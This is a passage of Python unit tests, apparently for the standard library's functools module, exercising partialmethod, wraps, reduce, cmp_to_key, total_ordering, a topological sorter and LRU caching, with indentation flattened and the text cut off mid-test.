keywords = functools.partialmethod(capture, a=2)
both = functools.partialmethod(capture, 3, b=4)
spec_keywords = functools.partialmethod(capture, self=1, func=2)
nested = functools.partialmethod(positional, 5)
over_partial = functools.partialmethod(functools.partial(capture, c=6), 7)
static = functools.partialmethod(staticmethod(capture), 8)
cls = functools.partialmethod(classmethod(capture), d=9)
a = A()
def test_arg_combinations(self):
self.assertEqual(self.a.nothing(), ((self.a,), {}))
self.assertEqual(self.a.nothing(5), ((self.a, 5), {}))
self.assertEqual(self.a.nothing(c=6), ((self.a,), {'c': 6}))
self.assertEqual(self.a.nothing(5, c=6), ((self.a, 5), {'c': 6}))
self.assertEqual(self.a.positional(), ((self.a, 1), {}))
self.assertEqual(self.a.positional(5), ((self.a, 1, 5), {}))
self.assertEqual(self.a.positional(c=6), ((self.a, 1), {'c': 6}))
self.assertEqual(self.a.positional(5, c=6), ((self.a, 1, 5), {'c': 6}))
self.assertEqual(self.a.keywords(), ((self.a,), {'a': 2}))
self.assertEqual(self.a.keywords(5), ((self.a, 5), {'a': 2}))
self.assertEqual(self.a.keywords(c=6), ((self.a,), {'a': 2, 'c': 6}))
self.assertEqual(self.a.keywords(5, c=6), ((self.a, 5), {'a': 2, 'c': 6}))
self.assertEqual(self.a.both(), ((self.a, 3), {'b': 4}))
self.assertEqual(self.a.both(5), ((self.a, 3, 5), {'b': 4}))
self.assertEqual(self.a.both(c=6), ((self.a, 3), {'b': 4, 'c': 6}))
self.assertEqual(self.a.both(5, c=6), ((self.a, 3, 5), {'b': 4, 'c': 6}))
self.assertEqual(self.A.both(self.a, 5, c=6), ((self.a, 3, 5), {'b': 4, 'c': 6}))
self.assertEqual(self.a.spec_keywords(), ((self.a,), {'self': 1, 'func': 2}))
def test_nested(self):
self.assertEqual(self.a.nested(), ((self.a, 1, 5), {}))
self.assertEqual(self.a.nested(6), ((self.a, 1, 5, 6), {}))
self.assertEqual(self.a.nested(d=7), ((self.a, 1, 5), {'d': 7}))
self.assertEqual(self.a.nested(6, d=7), ((self.a, 1, 5, 6), {'d': 7}))
self.assertEqual(self.A.nested(self.a, 6, d=7), ((self.a, 1, 5, 6), {'d': 7}))
def test_over_partial(self):
self.assertEqual(self.a.over_partial(), ((self.a, 7), {'c': 6}))
self.assertEqual(self.a.over_partial(5), ((self.a, 7, 5), {'c': 6}))
self.assertEqual(self.a.over_partial(d=8), ((self.a, 7), {'c': 6, 'd': 8}))
self.assertEqual(self.a.over_partial(5, d=8), ((self.a, 7, 5), {'c': 6, 'd': 8}))
self.assertEqual(self.A.over_partial(self.a, 5, d=8), ((self.a, 7, 5), {'c': 6, 'd': 8}))
def test_bound_method_introspection(self):
obj = self.a
self.assertIs(obj.both.__self__, obj)
self.assertIs(obj.nested.__self__, obj)
self.assertIs(obj.over_partial.__self__, obj)
self.assertIs(obj.cls.__self__, self.A)
self.assertIs(self.A.cls.__self__, self.A)
def test_unbound_method_retrieval(self):
obj = self.A
self.assertFalse(hasattr(obj.both, "__self__"))
self.assertFalse(hasattr(obj.nested, "__self__"))
self.assertFalse(hasattr(obj.over_partial, "__self__"))
self.assertFalse(hasattr(obj.static, "__self__"))
self.assertFalse(hasattr(self.a.static, "__self__"))
def test_descriptors(self):
for obj in [self.A, self.a]:
with self.subTest(obj=obj):
self.assertEqual(obj.static(), ((8,), {}))
self.assertEqual(obj.static(5), ((8, 5), {}))
self.assertEqual(obj.static(d=8), ((8,), {'d': 8}))
self.assertEqual(obj.static(5, d=8), ((8, 5), {'d': 8}))
self.assertEqual(obj.cls(), ((self.A,), {'d': 9}))
self.assertEqual(obj.cls(5), ((self.A, 5), {'d': 9}))
self.assertEqual(obj.cls(c=8), ((self.A,), {'c': 8, 'd': 9}))
self.assertEqual(obj.cls(5, c=8), ((self.A, 5), {'c': 8, 'd': 9}))
def test_overriding_keywords(self):
self.assertEqual(self.a.keywords(a=3), ((self.a,), {'a': 3}))
self.assertEqual(self.A.keywords(self.a, a=3), ((self.a,), {'a': 3}))
def test_invalid_args(self):
with self.assertRaises(TypeError):
class B(object):
method = functools.partialmethod(None, 1)
with self.assertRaises(TypeError):
class B:
method = functools.partialmethod()
with self.assertRaises(TypeError):
class B:
method = functools.partialmethod(func=capture, a=1)
def test_repr(self):
self.assertEqual(repr(vars(self.A)['both']),
'functools.partialmethod({}, 3, b=4)'.format(capture))
def test_abstract(self):
class Abstract(abc.ABCMeta):
@abc.abstractmethod
def add(self, x, y):
pass
add5 = functools.partialmethod(add, 5)
self.assertTrue(Abstract.add.__isabstractmethod__)
self.assertTrue(Abstract.add5.__isabstractmethod__)
for func in [self.A.static, self.A.cls, self.A.over_partial, self.A.nested, self.A.both]:
self.assertFalse(getattr(func, '__isabstractmethod__', False))
def test_positional_only(self):
def f(a, b, /):
return a + b
p = functools.partial(f, 1)
self.assertEqual(p(2), f(1, 2))
class TestUpdateWrapper(unittest.TestCase):
def check_wrapper(self, wrapper, wrapped,
assigned=functools.WRAPPER_ASSIGNMENTS,
updated=functools.WRAPPER_UPDATES):
# Check attributes were assigned
for name in assigned:
self.assertIs(getattr(wrapper, name), getattr(wrapped, name))
# Check attributes were updated
for name in updated:
wrapper_attr = getattr(wrapper, name)
wrapped_attr = getattr(wrapped, name)
for key in wrapped_attr:
if name == "__dict__" and key == "__wrapped__":
# __wrapped__ is overwritten by the update code
continue
self.assertIs(wrapped_attr[key], wrapper_attr[key])
# Check __wrapped__
self.assertIs(wrapper.__wrapped__, wrapped)
def _default_update(self):
def f(a:'This is a new annotation'):
"""This is a test"""
pass
f.attr = 'This is also a test'
f.__wrapped__ = "This is a bald faced lie"
def wrapper(b:'This is the prior annotation'):
pass
functools.update_wrapper(wrapper, f)
return wrapper, f
def test_default_update(self):
wrapper, f = self._default_update()
self.check_wrapper(wrapper, f)
self.assertIs(wrapper.__wrapped__, f)
self.assertEqual(wrapper.__name__, 'f')
self.assertEqual(wrapper.__qualname__, f.__qualname__)
self.assertEqual(wrapper.attr, 'This is also a test')
self.assertEqual(wrapper.__annotations__['a'], 'This is a new annotation')
self.assertNotIn('b', wrapper.__annotations__)
@unittest.skipIf(sys.flags.optimize >= 2,
"Docstrings are omitted with -O2 and above")
def test_default_update_doc(self):
wrapper, f = self._default_update()
self.assertEqual(wrapper.__doc__, 'This is a test')
def test_no_update(self):
def f():
"""This is a test"""
pass
f.attr = 'This is also a test'
def wrapper():
pass
functools.update_wrapper(wrapper, f, (), ())
self.check_wrapper(wrapper, f, (), ())
self.assertEqual(wrapper.__name__, 'wrapper')
self.assertNotEqual(wrapper.__qualname__, f.__qualname__)
self.assertEqual(wrapper.__doc__, None)
self.assertEqual(wrapper.__annotations__, {})
self.assertFalse(hasattr(wrapper, 'attr'))
def test_selective_update(self):
def f():
pass
f.attr = 'This is a different test'
f.dict_attr = dict(a=1, b=2, c=3)
def wrapper():
pass
wrapper.dict_attr = {}
assign = ('attr',)
update = ('dict_attr',)
functools.update_wrapper(wrapper, f, assign, update)
self.check_wrapper(wrapper, f, assign, update)
self.assertEqual(wrapper.__name__, 'wrapper')
self.assertNotEqual(wrapper.__qualname__, f.__qualname__)
self.assertEqual(wrapper.__doc__, None)
self.assertEqual(wrapper.attr, 'This is a different test')
self.assertEqual(wrapper.dict_attr, f.dict_attr)
def test_missing_attributes(self):
def f():
pass
def wrapper():
pass
wrapper.dict_attr = {}
assign = ('attr',)
update = ('dict_attr',)
# Missing attributes on wrapped object are ignored
functools.update_wrapper(wrapper, f, assign, update)
self.assertNotIn('attr', wrapper.__dict__)
self.assertEqual(wrapper.dict_attr, {})
# Wrapper must have expected attributes for updating
del wrapper.dict_attr
with self.assertRaises(AttributeError):
functools.update_wrapper(wrapper, f, assign, update)
wrapper.dict_attr = 1
with self.assertRaises(AttributeError):
functools.update_wrapper(wrapper, f, assign, update)
@support.requires_docstrings
@unittest.skipIf(sys.flags.optimize >= 2,
"Docstrings are omitted with -O2 and above")
def test_builtin_update(self):
# Test for bug #1576241
def wrapper():
pass
functools.update_wrapper(wrapper, max)
self.assertEqual(wrapper.__name__, 'max')
self.assertTrue(wrapper.__doc__.startswith('max('))
self.assertEqual(wrapper.__annotations__, {})
class TestWraps(TestUpdateWrapper):
def _default_update(self):
def f():
"""This is a test"""
pass
f.attr = 'This is also a test'
f.__wrapped__ = "This is still a bald faced lie"
@functools.wraps(f)
def wrapper():
pass
return wrapper, f
def test_default_update(self):
wrapper, f = self._default_update()
self.check_wrapper(wrapper, f)
self.assertEqual(wrapper.__name__, 'f')
self.assertEqual(wrapper.__qualname__, f.__qualname__)
self.assertEqual(wrapper.attr, 'This is also a test')
@unittest.skipIf(sys.flags.optimize >= 2,
"Docstrings are omitted with -O2 and above")
def test_default_update_doc(self):
wrapper, _ = self._default_update()
self.assertEqual(wrapper.__doc__, 'This is a test')
def test_no_update(self):
def f():
"""This is a test"""
pass
f.attr = 'This is also a test'
@functools.wraps(f, (), ())
def wrapper():
pass
self.check_wrapper(wrapper, f, (), ())
self.assertEqual(wrapper.__name__, 'wrapper')
self.assertNotEqual(wrapper.__qualname__, f.__qualname__)
self.assertEqual(wrapper.__doc__, None)
self.assertFalse(hasattr(wrapper, 'attr'))
def test_selective_update(self):
def f():
pass
f.attr = 'This is a different test'
f.dict_attr = dict(a=1, b=2, c=3)
def add_dict_attr(f):
f.dict_attr = {}
return f
assign = ('attr',)
update = ('dict_attr',)
@functools.wraps(f, assign, update)
@add_dict_attr
def wrapper():
pass
self.check_wrapper(wrapper, f, assign, update)
self.assertEqual(wrapper.__name__, 'wrapper')
self.assertNotEqual(wrapper.__qualname__, f.__qualname__)
self.assertEqual(wrapper.__doc__, None)
self.assertEqual(wrapper.attr, 'This is a different test')
self.assertEqual(wrapper.dict_attr, f.dict_attr)
class TestReduce:
def test_reduce(self):
class Squares:
def __init__(self, max):
self.max = max
self.sofar = []
def __len__(self):
return len(self.sofar)
def __getitem__(self, i):
if not 0 <= i < self.max: raise IndexError
n = len(self.sofar)
while n <= i:
self.sofar.append(n*n)
n += 1
return self.sofar[i]
def add(x, y):
return x + y
self.assertEqual(self.reduce(add, ['a', 'b', 'c'], ''), 'abc')
self.assertEqual(
self.reduce(add, [['a', 'c'], [], ['d', 'w']], []),
['a','c','d','w']
)
self.assertEqual(self.reduce(lambda x, y: x*y, range(2,8), 1), 5040)
self.assertEqual(
self.reduce(lambda x, y: x*y, range(2,21), 1),
2432902008176640000
)
self.assertEqual(self.reduce(add, Squares(10)), 285)
self.assertEqual(self.reduce(add, Squares(10), 0), 285)
self.assertEqual(self.reduce(add, Squares(0), 0), 0)
self.assertRaises(TypeError, self.reduce)
self.assertRaises(TypeError, self.reduce, 42, 42)
self.assertRaises(TypeError, self.reduce, 42, 42, 42)
self.assertEqual(self.reduce(42, "1"), "1") # func is never called with one item
self.assertEqual(self.reduce(42, "", "1"), "1") # func is never called with one item
self.assertRaises(TypeError, self.reduce, 42, (42, 42))
self.assertRaises(TypeError, self.reduce, add, []) # arg 2 must not be empty sequence with no initial value
self.assertRaises(TypeError, self.reduce, add, "")
self.assertRaises(TypeError, self.reduce, add, ())
self.assertRaises(TypeError, self.reduce, add, object())
class TestFailingIter:
def __iter__(self):
raise RuntimeError
self.assertRaises(RuntimeError, self.reduce, add, TestFailingIter())
self.assertEqual(self.reduce(add, [], None), None)
self.assertEqual(self.reduce(add, [], 42), 42)
class BadSeq:
def __getitem__(self, index):
raise ValueError
self.assertRaises(ValueError, self.reduce, 42, BadSeq())
# Test reduce()'s use of iterators.
def test_iterator_usage(self):
class SequenceClass:
def __init__(self, n):
self.n = n
def __getitem__(self, i):
if 0 <= i < self.n:
return i
else:
raise IndexError
from operator import add
self.assertEqual(self.reduce(add, SequenceClass(5)), 10)
self.assertEqual(self.reduce(add, SequenceClass(5), 42), 52)
self.assertRaises(TypeError, self.reduce, add, SequenceClass(0))
self.assertEqual(self.reduce(add, SequenceClass(0), 42), 42)
self.assertEqual(self.reduce(add, SequenceClass(1)), 0)
self.assertEqual(self.reduce(add, SequenceClass(1), 42), 42)
d = {"one": 1, "two": 2, "three": 3}
self.assertEqual(self.reduce(add, d), "".join(d.keys()))
@unittest.skipUnless(c_functools, 'requires the C _functools module')
class TestReduceC(TestReduce, unittest.TestCase):
if c_functools:
reduce = c_functools.reduce
class TestReducePy(TestReduce, unittest.TestCase):
reduce = staticmethod(py_functools.reduce)
class TestCmpToKey:
def test_cmp_to_key(self):
def cmp1(x, y):
return (x > y) - (x < y)
key = self.cmp_to_key(cmp1)
self.assertEqual(key(3), key(3))
self.assertGreater(key(3), key(1))
self.assertGreaterEqual(key(3), key(3))
def cmp2(x, y):
return int(x) - int(y)
key = self.cmp_to_key(cmp2)
self.assertEqual(key(4.0), key('4'))
self.assertLess(key(2), key('35'))
self.assertLessEqual(key(2), key('35'))
self.assertNotEqual(key(2), key('35'))
def test_cmp_to_key_arguments(self):
def cmp1(x, y):
return (x > y) - (x < y)
key = self.cmp_to_key(mycmp=cmp1)
self.assertEqual(key(obj=3), key(obj=3))
self.assertGreater(key(obj=3), key(obj=1))
with self.assertRaises((TypeError, AttributeError)):
key(3) > 1 # rhs is not a K object
with self.assertRaises((TypeError, AttributeError)):
1 < key(3) # lhs is not a K object
with self.assertRaises(TypeError):
key = self.cmp_to_key() # too few args
with self.assertRaises(TypeError):
key = self.cmp_to_key(cmp1, None) # too many args
key = self.cmp_to_key(cmp1)
with self.assertRaises(TypeError):
key() # too few args
with self.assertRaises(TypeError):
key(None, None) # too many args
def test_bad_cmp(self):
def cmp1(x, y):
raise ZeroDivisionError
key = self.cmp_to_key(cmp1)
with self.assertRaises(ZeroDivisionError):
key(3) > key(1)
class BadCmp:
def __lt__(self, other):
raise ZeroDivisionError
def cmp1(x, y):
return BadCmp()
with self.assertRaises(ZeroDivisionError):
key(3) > key(1)
def test_obj_field(self):
def cmp1(x, y):
return (x > y) - (x < y)
key = self.cmp_to_key(mycmp=cmp1)
self.assertEqual(key(50).obj, 50)
def test_sort_int(self):
def mycmp(x, y):
return y - x
self.assertEqual(sorted(range(5), key=self.cmp_to_key(mycmp)),
[4, 3, 2, 1, 0])
def test_sort_int_str(self):
def mycmp(x, y):
x, y = int(x), int(y)
return (x > y) - (x < y)
values = [5, '3', 7, 2, '0', '1', 4, '10', 1]
values = sorted(values, key=self.cmp_to_key(mycmp))
self.assertEqual([int(value) for value in values],
[0, 1, 1, 2, 3, 4, 5, 7, 10])
def test_hash(self):
def mycmp(x, y):
return y - x
key = self.cmp_to_key(mycmp)
k = key(10)
self.assertRaises(TypeError, hash, k)
self.assertNotIsInstance(k, collections.abc.Hashable)
@unittest.skipUnless(c_functools, 'requires the C _functools module')
class TestCmpToKeyC(TestCmpToKey, unittest.TestCase):
if c_functools:
cmp_to_key = c_functools.cmp_to_key
class TestCmpToKeyPy(TestCmpToKey, unittest.TestCase):
cmp_to_key = staticmethod(py_functools.cmp_to_key)
class TestTotalOrdering(unittest.TestCase):
def test_total_ordering_lt(self):
@functools.total_ordering
class A:
def __init__(self, value):
self.value = value
def __lt__(self, other):
return self.value < other.value
def __eq__(self, other):
return self.value == other.value
self.assertTrue(A(1) < A(2))
self.assertTrue(A(2) > A(1))
self.assertTrue(A(1) <= A(2))
self.assertTrue(A(2) >= A(1))
self.assertTrue(A(2) <= A(2))
self.assertTrue(A(2) >= A(2))
self.assertFalse(A(1) > A(2))
def test_total_ordering_le(self):
@functools.total_ordering
class A:
def __init__(self, value):
self.value = value
def __le__(self, other):
return self.value <= other.value
def __eq__(self, other):
return self.value == other.value
self.assertTrue(A(1) < A(2))
self.assertTrue(A(2) > A(1))
self.assertTrue(A(1) <= A(2))
self.assertTrue(A(2) >= A(1))
self.assertTrue(A(2) <= A(2))
self.assertTrue(A(2) >= A(2))
self.assertFalse(A(1) >= A(2))
def test_total_ordering_gt(self):
@functools.total_ordering
class A:
def __init__(self, value):
self.value = value
def __gt__(self, other):
return self.value > other.value
def __eq__(self, other):
return self.value == other.value
self.assertTrue(A(1) < A(2))
self.assertTrue(A(2) > A(1))
self.assertTrue(A(1) <= A(2))
self.assertTrue(A(2) >= A(1))
self.assertTrue(A(2) <= A(2))
self.assertTrue(A(2) >= A(2))
self.assertFalse(A(2) < A(1))
def test_total_ordering_ge(self):
@functools.total_ordering
class A:
def __init__(self, value):
self.value = value
def __ge__(self, other):
return self.value >= other.value
def __eq__(self, other):
return self.value == other.value
self.assertTrue(A(1) < A(2))
self.assertTrue(A(2) > A(1))
self.assertTrue(A(1) <= A(2))
self.assertTrue(A(2) >= A(1))
self.assertTrue(A(2) <= A(2))
self.assertTrue(A(2) >= A(2))
self.assertFalse(A(2) <= A(1))
def test_total_ordering_no_overwrite(self):
# new methods should not overwrite existing
@functools.total_ordering
class A(int):
pass
self.assertTrue(A(1) < A(2))
self.assertTrue(A(2) > A(1))
self.assertTrue(A(1) <= A(2))
self.assertTrue(A(2) >= A(1))
self.assertTrue(A(2) <= A(2))
self.assertTrue(A(2) >= A(2))
def test_no_operations_defined(self):
with self.assertRaises(ValueError):
@functools.total_ordering
class A:
pass
def test_type_error_when_not_implemented(self):
# bug 10042; ensure stack overflow does not occur
# when decorated types return NotImplemented
@functools.total_ordering
class ImplementsLessThan:
def __init__(self, value):
self.value = value
def __eq__(self, other):
if isinstance(other, ImplementsLessThan):
return self.value == other.value
return False
def __lt__(self, other):
if isinstance(other, ImplementsLessThan):
return self.value < other.value
return NotImplemented
@functools.total_ordering
class ImplementsGreaterThan:
def __init__(self, value):
self.value = value
def __eq__(self, other):
if isinstance(other, ImplementsGreaterThan):
return self.value == other.value
return False
def __gt__(self, other):
if isinstance(other, ImplementsGreaterThan):
return self.value > other.value
return NotImplemented
@functools.total_ordering
class ImplementsLessThanEqualTo:
def __init__(self, value):
self.value = value
def __eq__(self, other):
if isinstance(other, ImplementsLessThanEqualTo):
return self.value == other.value
return False
def __le__(self, other):
if isinstance(other, ImplementsLessThanEqualTo):
return self.value <= other.value
return NotImplemented
@functools.total_ordering
class ImplementsGreaterThanEqualTo:
def __init__(self, value):
self.value = value
def __eq__(self, other):
if isinstance(other, ImplementsGreaterThanEqualTo):
return self.value == other.value
return False
def __ge__(self, other):
if isinstance(other, ImplementsGreaterThanEqualTo):
return self.value >= other.value
return NotImplemented
@functools.total_ordering
class ComparatorNotImplemented:
def __init__(self, value):
self.value = value
def __eq__(self, other):
if isinstance(other, ComparatorNotImplemented):
return self.value == other.value
return False
def __lt__(self, other):
return NotImplemented
with self.subTest("LT < 1"), self.assertRaises(TypeError):
ImplementsLessThan(-1) < 1
with self.subTest("LT < LE"), self.assertRaises(TypeError):
ImplementsLessThan(0) < ImplementsLessThanEqualTo(0)
with self.subTest("LT < GT"), self.assertRaises(TypeError):
ImplementsLessThan(1) < ImplementsGreaterThan(1)
with self.subTest("LE <= LT"), self.assertRaises(TypeError):
ImplementsLessThanEqualTo(2) <= ImplementsLessThan(2)
with self.subTest("LE <= GE"), self.assertRaises(TypeError):
ImplementsLessThanEqualTo(3) <= ImplementsGreaterThanEqualTo(3)
with self.subTest("GT > GE"), self.assertRaises(TypeError):
ImplementsGreaterThan(4) > ImplementsGreaterThanEqualTo(4)
with self.subTest("GT > LT"), self.assertRaises(TypeError):
ImplementsGreaterThan(5) > ImplementsLessThan(5)
with self.subTest("GE >= GT"), self.assertRaises(TypeError):
ImplementsGreaterThanEqualTo(6) >= ImplementsGreaterThan(6)
with self.subTest("GE >= LE"), self.assertRaises(TypeError):
ImplementsGreaterThanEqualTo(7) >= ImplementsLessThanEqualTo(7)
with self.subTest("GE when equal"):
a = ComparatorNotImplemented(8)
b = ComparatorNotImplemented(8)
self.assertEqual(a, b)
with self.assertRaises(TypeError):
a >= b
with self.subTest("LE when equal"):
a = ComparatorNotImplemented(9)
b = ComparatorNotImplemented(9)
self.assertEqual(a, b)
with self.assertRaises(TypeError):
a <= b
def test_pickle(self):
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
for name in '__lt__', '__gt__', '__le__', '__ge__':
with self.subTest(method=name, proto=proto):
method = getattr(Orderable_LT, name)
method_copy = pickle.loads(pickle.dumps(method, proto))
self.assertIs(method_copy, method)
@functools.total_ordering
class Orderable_LT:
def __init__(self, value):
self.value = value
def __lt__(self, other):
return self.value < other.value
def __eq__(self, other):
return self.value == other.value
class TestTopologicalSort(unittest.TestCase):
def _test_graph(self, graph, expected):
def static_order_with_groups(ts):
ts.prepare()
while ts.is_active():
nodes = ts.get_ready()
for node in nodes:
ts.done(node)
yield nodes
ts = functools.TopologicalSorter(graph)
self.assertEqual(list(static_order_with_groups(ts)), list(expected))
ts = functools.TopologicalSorter(graph)
self.assertEqual(list(ts.static_order()), list(chain(*expected)))
def _assert_cycle(self, graph, cycle):
ts = functools.TopologicalSorter()
for node, dependson in graph.items():
ts.add(node, *dependson)
try:
ts.prepare()
except functools.CycleError as e:
msg, seq = e.args
self.assertIn(' '.join(map(str, cycle)),
' '.join(map(str, seq * 2)))
else:
raise
def test_simple_cases(self):
self._test_graph(
{2: {11},
9: {11, 8},
10: {11, 3},
11: {7, 5},
8: {7, 3}},
[(3, 5, 7), (11, 8), (2, 10, 9)]
)
self._test_graph({1: {}}, [(1,)])
self._test_graph({x: {x+1} for x in range(10)},
[(x,) for x in range(10, -1, -1)])
self._test_graph({2: {3}, 3: {4}, 4: {5}, 5: {1},
11: {12}, 12: {13}, 13: {14}, 14: {15}},
[(1, 15), (5, 14), (4, 13), (3, 12), (2, 11)])
self._test_graph({
0: [1, 2],
1: [3],
2: [5, 6],
3: [4],
4: [9],
5: [3],
6: [7],
7: [8],
8: [4],
9: []
},
[(9,), (4,), (3, 8), (1, 5, 7), (6,), (2,), (0,)]
)
self._test_graph({
0: [1, 2],
1: [],
2: [3],
3: []
},
[(1, 3), (2,), (0,)]
)
self._test_graph({
0: [1, 2],
1: [],
2: [3],
3: [],
4: [5],
5: [6],
6: []
},
[(1, 3, 6), (2, 5), (0, 4)]
)
def test_no_dependencies(self):
self._test_graph(
{1: {2},
3: {4},
5: {6}},
[(2, 4, 6), (1, 3, 5)]
)
self._test_graph(
{1: set(),
3: set(),
5: set()},
[(1, 3, 5)]
)
def test_the_node_multiple_times(self):
# Test same node multiple times in dependencies
self._test_graph({1: {2}, 3: {4}, 0: [2, 4, 4, 4, 4, 4]},
[(2, 4), (1, 3, 0)])
# Test adding the same dependency multiple times
ts = functools.TopologicalSorter()
ts.add(1, 2)
ts.add(1, 2)
ts.add(1, 2)
self.assertEqual([*ts.static_order()], [2, 1])
def test_graph_with_iterables(self):
dependson = (2*x + 1 for x in range(5))
ts = functools.TopologicalSorter({0: dependson})
self.assertEqual(list(ts.static_order()), [1, 3, 5, 7, 9, 0])
def test_add_dependencies_for_same_node_incrementally(self):
# Test same node multiple times
ts = functools.TopologicalSorter()
ts.add(1, 2)
ts.add(1, 3)
ts.add(1, 4)
ts.add(1, 5)
ts2 = functools.TopologicalSorter({1: {2, 3, 4, 5}})
self.assertEqual([*ts.static_order()], [*ts2.static_order()])
def test_empty(self):
self._test_graph({}, [])
def test_cycle(self):
# Self cycle
self._assert_cycle({1: {1}}, [1, 1])
# Simple cycle
self._assert_cycle({1: {2}, 2: {1}}, [1, 2, 1])
# Indirect cycle
self._assert_cycle({1: {2}, 2: {3}, 3: {1}}, [1, 3, 2, 1])
# not all elements involved in a cycle
self._assert_cycle({1: {2}, 2: {3}, 3: {1}, 5: {4}, 4: {6}}, [1, 3, 2, 1])
# Multiple cycles
self._assert_cycle({1: {2}, 2: {1}, 3: {4}, 4: {5}, 6: {7}, 7: {6}},
[1, 2, 1])
# Cycle in the middle of the graph
self._assert_cycle({1: {2}, 2: {3}, 3: {2, 4}, 4: {5}}, [3, 2])
def test_calls_before_prepare(self):
ts = functools.TopologicalSorter()
with self.assertRaisesRegex(ValueError, r"prepare\(\) must be called first"):
ts.get_ready()
with self.assertRaisesRegex(ValueError, r"prepare\(\) must be called first"):
ts.done(3)
with self.assertRaisesRegex(ValueError, r"prepare\(\) must be called first"):
ts.is_active()
def test_prepare_multiple_times(self):
ts = functools.TopologicalSorter()
ts.prepare()
with self.assertRaisesRegex(ValueError, r"cannot prepare\(\) more than once"):
ts.prepare()
def test_invalid_nodes_in_done(self):
ts = functools.TopologicalSorter()
ts.add(1, 2, 3, 4)
ts.add(2, 3, 4)
ts.prepare()
ts.get_ready()
with self.assertRaisesRegex(ValueError, "node 2 was not passed out"):
ts.done(2)
with self.assertRaisesRegex(ValueError, r"node 24 was not added using add\(\)"):
ts.done(24)
def test_done(self):
ts = functools.TopologicalSorter()
ts.add(1, 2, 3, 4)
ts.add(2, 3)
ts.prepare()
self.assertEqual(ts.get_ready(), (3, 4))
# If we don't mark anything as done, get_ready() returns nothing
self.assertEqual(ts.get_ready(), ())
ts.done(3)
# Now 2 becomes available as 3 is done
self.assertEqual(ts.get_ready(), (2,))
self.assertEqual(ts.get_ready(), ())
ts.done(4)
ts.done(2)
# Only 1 is missing
self.assertEqual(ts.get_ready(), (1,))
self.assertEqual(ts.get_ready(), ())
ts.done(1)
self.assertEqual(ts.get_ready(), ())
self.assertFalse(ts.is_active())
def test_is_active(self):
ts = functools.TopologicalSorter()
ts.add(1, 2)
ts.prepare()
self.assertTrue(ts.is_active())
self.assertEqual(ts.get_ready(), (2,))
self.assertTrue(ts.is_active())
ts.done(2)
self.assertTrue(ts.is_active())
self.assertEqual(ts.get_ready(), (1,))
self.assertTrue(ts.is_active())
ts.done(1)
self.assertFalse(ts.is_active())
def test_not_hashable_nodes(self):
ts = functools.TopologicalSorter()
self.assertRaises(TypeError, ts.add, dict(), 1)
self.assertRaises(TypeError, ts.add, 1, dict())
self.assertRaises(TypeError, ts.add, dict(), dict())
def test_order_of_insertion_does_not_matter_between_groups(self):
def get_groups(ts):
ts.prepare()
while ts.is_active():
nodes = ts.get_ready()
ts.done(*nodes)
yield set(nodes)
ts = functools.TopologicalSorter()
ts.add(3, 2, 1)
ts.add(1, 0)
ts.add(4, 5)
ts.add(6, 7)
ts.add(4, 7)
ts2 = functools.TopologicalSorter()
ts2.add(1, 0)
ts2.add(3, 2, 1)
ts2.add(4, 7)
ts2.add(6, 7)
ts2.add(4, 5)
self.assertEqual(list(get_groups(ts)), list(get_groups(ts2)))
def test_static_order_does_not_change_with_the_hash_seed(self):
def check_order_with_hash_seed(seed):
code = """if 1:
import functools
ts = functools.TopologicalSorter()
ts.add('blech', 'bluch', 'hola')
ts.add('abcd', 'blech', 'bluch', 'a', 'b')
ts.add('a', 'a string', 'something', 'b')
ts.add('bluch', 'hola', 'abcde', 'a', 'b')
print(list(ts.static_order()))
"""
env = os.environ.copy()
# signal to assert_python not to do a copy
# of os.environ on its own
env['__cleanenv'] = True
env['PYTHONHASHSEED'] = str(seed)
out = assert_python_ok('-c', code, **env)
return out
run1 = check_order_with_hash_seed(1234)
run2 = check_order_with_hash_seed(31415)
self.assertNotEqual(run1, "")
self.assertNotEqual(run2, "")
self.assertEqual(run1, run2)
class TestCache:
# This tests that the pass-through is working as designed.
# The underlying functionality is tested in TestLRU.
def test_cache(self):
@self.module.cache
def fib(n):
if n < 2:
return n
return fib(n-1) + fib(n-2)
self.assertEqual([fib(n) for n in range(16)],
[0, 1, 1, 2, 3, 5, 8, 13, 21, 34, 55, 89, 144, 233, 377, 610])
self.assertEqual(fib.cache_info(),
self.module._CacheInfo(hits=28, misses=16, maxsize=None, currsize=16))
fib.cache_clear()
self.assertEqual(fib.cache_info(),
self.module._CacheInfo(hits=0, misses=0, maxsize=None, currsize=0))
class TestLRU:
def test_lru(self):
def orig(x, y):
return 3 * x + y
f = self.module.lru_cache(maxsize=20)(orig)
hits, misses, maxsize, currsize = f.cache_info()
self.assertEqual(maxsize, 20)
self.assertEqual(currsize, 0)
self.assertEqual(hits, 0)
self.assertEqual(misses, 0)
domain = range(5)
for i in range(1000):
x, y = choice(domain), choice(domain)
actual = f(x, y)
expected = orig(x, y)
self.assertEqual(actual, expected)
hits, misses, maxsize, currsize = f.cache_info()
self.assertTrue(hits > misses)
self.assertEqual(hits + misses, 1000)
self.assertEqual(currsize, 20)
f.cache_clear() # test clearing
hits, misses, maxsize, currsize = f.cache_info()
self.assertEqual(hits, 0)
self.assertEqual(misses, 0)
self.assertEqual(currsize, 0)
f(x, y)
hits, misses, maxsize, currsize = f.cache_info()
self.assertEqual(hits, 0)
self.assertEqual(misses, 1)
self.assertEqual(currsize, 1)
# Test bypassing the cache
self.assertIs(f.__wrapped__, orig)
f.__wrapped__(x, y)
hits, misses, maxsize, currsize = f.cache_info()
self.assertEqual(hits, 0)
self.assertEqual(misses, 1)
self.assertEqual(currsize, 1)
# test size zero (which means "never-cache")
@self.module.lru_cache(0)
def f():
nonlocal f_cnt
f_cnt += 1
return 20
self.assertEqual(f.cache_info().maxsize, 0)
f_cnt = 0
for i in range(5):
self.assertEqual(f(), 20)
self.assertEqual(f_cnt, 5)
hits, misses, maxsize, currsize = f.cache_info()
self.assertEqual(hits, 0)
self.assertEqual(misses, 5)
self.assertEqual(currsize, 0)
# test size one
@self.module.lru_cache(1)
def f():
nonlocal f_cnt
f_cnt += 1
return 20
self.assertEqual(f.cache_info().maxsize, 1)
f_cnt = 0
for i in range(5):
self.assertEqual(f(), 20)
self.assertEqual(f_cnt, 1)
hits, misses, maxsize, currsize = f.cache_info()
self.assertEqual(hits, 4)
self.assertEqual(misses, 1)
self.assertEqual(currsize, 1)
# test size two
@self.module.lru_cache(2)
def f(x):
nonlocal f_cnt
f_cnt += 1
return x*10
self.assertEqual(f.cache_info().maxsize, 2)
f_cnt = 0
for x in 7, 9, 7, 9, 7, 9, 8, 8, 8, 9, 9, 9, 8, 8, 8, 7:
# * * * *
self.assertEqual(f(x), x*10)
